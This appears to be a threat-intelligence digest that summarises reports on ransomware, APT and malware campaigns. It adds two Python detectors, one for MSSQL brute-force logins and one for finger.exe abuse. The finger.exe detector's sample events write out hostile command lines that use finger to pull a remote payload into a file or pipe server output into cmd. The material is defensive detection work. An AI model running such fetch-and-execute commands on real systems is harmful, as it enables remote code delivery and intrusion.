eSentire’s TRU unit tracked an October 2023 LockBit ransomware intrusion linked to a Citrix Bleed (CVE-2023-4966) exploit, including initial access via hijacked session tokens and C2 activity tied to Brute Ratel and FileTransfer assets. The investigation details the…
PlugX is a covert malware linked to cyber espionage and targeted attacks, with a history of evasion and modular capabilities. Splunk Threat Research Team provides a deep dive into a PlugX variant, covering its side-loading, multi-layer payload decryption, and …
Attacks on a critical infrastructure target in South Africa, supply-chain attack on Linux machines, Telegram doppelganger used to target people in China.
Threat actors in the DB#JAMMER campaigns compromised exposed MSSQL databases via brute-force login attempts and deployed a full toolkit leading to ransomware and Cobalt Strike payloads. The operation progressed from initial access through enumeration, defense …
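The DB#JAMMER entry above starts with password brute-forcing against an exposed MSSQL instance. The following detection, added here as an illustration and not taken from the Securonix report, counts failed SQL logins per client address in a sliding window and raises a second, higher-priority alert when the same client then succeeds. The log lines are constructed for the example and modeled on the SQL Server errorlog "Login failed for user" / "Login succeeded for user" messages; the threshold and window are arbitrary tuning assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Matches SQL Server errorlog logon lines, e.g.
#   2023-09-01 12:00:01.23 Logon       Login failed for user 'sa'. Reason: ... [CLIENT: 203.0.113.5]
LOGIN_RE = re.compile(
    r"^(?P<ts>\S+ \S+) Logon\s+Login (?P<result>failed|succeeded) for user "
    r"'(?P<user>[^']+)'.*\[CLIENT: (?P<client>[^\]]+)\]$"
)

# Constructed sample errorlog excerpt (not real telemetry): one client hammers 'sa'
# six times in two seconds and then gets in; a second client has a single typo.
SAMPLE_ERRORLOG = """\
2023-09-01 12:00:01.23 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2023-09-01 12:00:01.41 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2023-09-01 12:00:01.60 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2023-09-01 12:00:01.85 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2023-09-01 12:00:02.02 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2023-09-01 12:00:02.30 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2023-09-01 12:00:03.10 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 203.0.113.5]
2023-09-01 12:05:00.00 Logon       Login failed for user 'appsvc'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.21]
2023-09-01 12:05:30.00 Logon       Login succeeded for user 'appsvc'. Connection made using SQL Server authentication. [CLIENT: 10.0.0.21]
"""


def detect_mssql_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return alerts for clients that exceed `threshold` failed logins inside `window`,
    plus a follow-up alert if such a client subsequently logs in successfully."""
    failures = defaultdict(list)   # client address -> timestamps of recent failures
    flagged = set()                # clients already reported for brute force
    alerts = []
    for line in log_text.splitlines():
        m = LOGIN_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
        client, user = m["client"], m["user"]
        # Keep only failures that still fall inside the sliding window.
        recent = [t for t in failures[client] if ts - t <= window]
        if m["result"] == "failed":
            recent.append(ts)
            if len(recent) >= threshold and client not in flagged:
                flagged.add(client)
                alerts.append({"type": "brute_force", "client": client, "user": user,
                               "failures": len(recent), "at": ts})
        elif client in flagged and recent:
            # Success shortly after a burst of failures: likely a guessed password.
            alerts.append({"type": "brute_force_success", "client": client, "user": user,
                           "failures": len(recent), "at": ts})
        failures[client] = recent
    return alerts


if __name__ == "__main__":
    for alert in detect_mssql_bruteforce(SAMPLE_ERRORLOG):
        print(alert)
```

The success-after-failures alert is the one worth paging on: a burst of 18456 failures alone is noisy on any internet-exposed SQL port, but a success from the same client inside the window is the point at which the toolkit described above starts landing. In production, run this against the errorlog or the corresponding Application log events rather than the embedded sample.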
Genians Security Center observed a Korean-targeted APT campaign that delivers malicious OLE objects embedded in HWP documents to execute encrypted PowerShell payloads from the FlowerPower tool family. Attackers leverage GitHub as a covert command-and-control/h…
Threat actors repurpose native Windows tools (LOLBins) such as finger.exe to enable data ingress and exfiltration while blending in with legitimate activity. The Huntress report shows finger.exe used to download files to the endpoint, enumerate information, an…
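The finger.exe technique summarised above is easy to hunt for because a legitimate host almost never runs finger against a remote address, let alone redirects its output into a file or pipes it into a shell. The following triage logic is an added example, not code from the Huntress report: it scans process-creation records for a finger invocation with a user@host target and classifies it by what happens to the output. The events are constructed Sysmon-style records with hypothetical paths and addresses.

```python
import ntpath
import re

# Constructed sample process-creation events (Sysmon Event ID 1 shape), not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd.exe /c finger stage@203.0.113.10 > C:\Users\Public\payload.txt"},
    {"Image": r"C:\Windows\System32\finger.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"finger stage@203.0.113.10"},
    {"Image": r"C:\Windows\System32\finger.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"finger.exe out@203.0.113.10 | cmd"},
    {"Image": r"C:\Program Files\Git\bin\git.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"git fetch origin"},
    {"Image": r"C:\Windows\System32\finger.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"finger"},  # no remote target: nothing to flag
]

# finger [-l] [user]@host  -- the user part may be empty, the host is what we care about.
FINGER_TARGET = re.compile(
    r"\bfinger(?:\.exe)?\s+(?:-l\s+)?(?P<user>[^\s@|>]*)@(?P<host>[A-Za-z0-9.\-]+)",
    re.IGNORECASE,
)


def classify_finger_event(event):
    """Return a finding dict if the command line drives finger at a remote host, else None."""
    cmd = event["CommandLine"]
    m = FINGER_TARGET.search(cmd)
    if not m:
        return None
    tail = cmd[m.end():]
    if ">" in tail:
        kind = "file_write"     # server response written to disk: file ingress
    elif "|" in tail:
        kind = "piped_exec"     # server response fed to another process: remote-controlled execution
    else:
        kind = "enumeration"    # bare query: recon or a beacon-style check-in
    return {
        "host": m.group("host"),
        "kind": kind,
        "parent": ntpath.basename(event["ParentImage"]),
        "command": cmd,
    }


def find_finger_abuse(events):
    """Run the classifier over a batch of process-creation events and keep the hits."""
    return [f for f in (classify_finger_event(e) for e in events) if f]


if __name__ == "__main__":
    for finding in find_finger_abuse(SAMPLE_EVENTS):
        print(finding)
```

Matching on the command line rather than only on the image name catches the case where cmd.exe carries the whole `finger ... > file` string and finger.exe itself shows up as a separate, less informative child event. Pair the host value with outbound connections to TCP port 79 from the same process for corroboration.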
Leveraging Ghidra to establish context and intent behind suspicious strings.
Check Point Research describes new SysJoker variants used in targeted attacks against Israeli organizations, highlighting a full rewrite in Rust and a shift from Google Drive to OneDrive for hosting encrypted C2 configuration. The report details persistence vi…
Qualys Threat Research uncovers Phobos ransomware masquerading as VX-Underground (VXUG), often distributed via stolen RDP and operating as a RaaS linked to Dharma/CrySIS. The article details anti-analysis checks, a wide process-kill routine, backup and firewal…
Microsoft Threat Intelligence uncovered a Diamond Sleet supply chain attack that tampered with a CyberLink installer to deliver a second-stage payload. The malicious file is signed with a valid CyberLink certificate, hosted on CyberLink infrastructure, and inc…
A NCC Group incident response study analyzes NoEscape ransomware techniques observed in a recent engagement, highlighting opportunistic access and noisy tool use. The findings cover ProxyShell exploit access to Exchange, RDP lateral movement with SSH tunneling…
DarkGate is a sophisticated Remote Access Trojan sold as Malware-as-a-Service by the actor RastaFarEye, evolving through multiple versions with advanced evasion and multi-stage loading chains. Trellix researchers document its deployment methods, feature set, a…
Unit 42 documents three Stately Taurus campaigns in August targeting South Pacific entities, including the Philippines government, using renamed Solid PDF Creator and a side-loaded DLL to maintain persistence and C2 activity. The actors also disguised C2 traff…
Securonix researchers describe an SEO poisoning/malvertising campaign dubbed SEO#LURKER that uses fake Google ads and lookalike sites to deliver a malicious WinSCP lure which sideloads DLLs and executes obfuscated Python payloads, resulting in C2 beaconing and…
ASEC reports attacks against vulnerable Apache web servers where threat actors deploy Cobalt Strike beacons and XMRig coin miners on Windows servers, often via PHP web shells and unpatched vulnerabilities. The operation uses obfuscated malware, staged beacons,…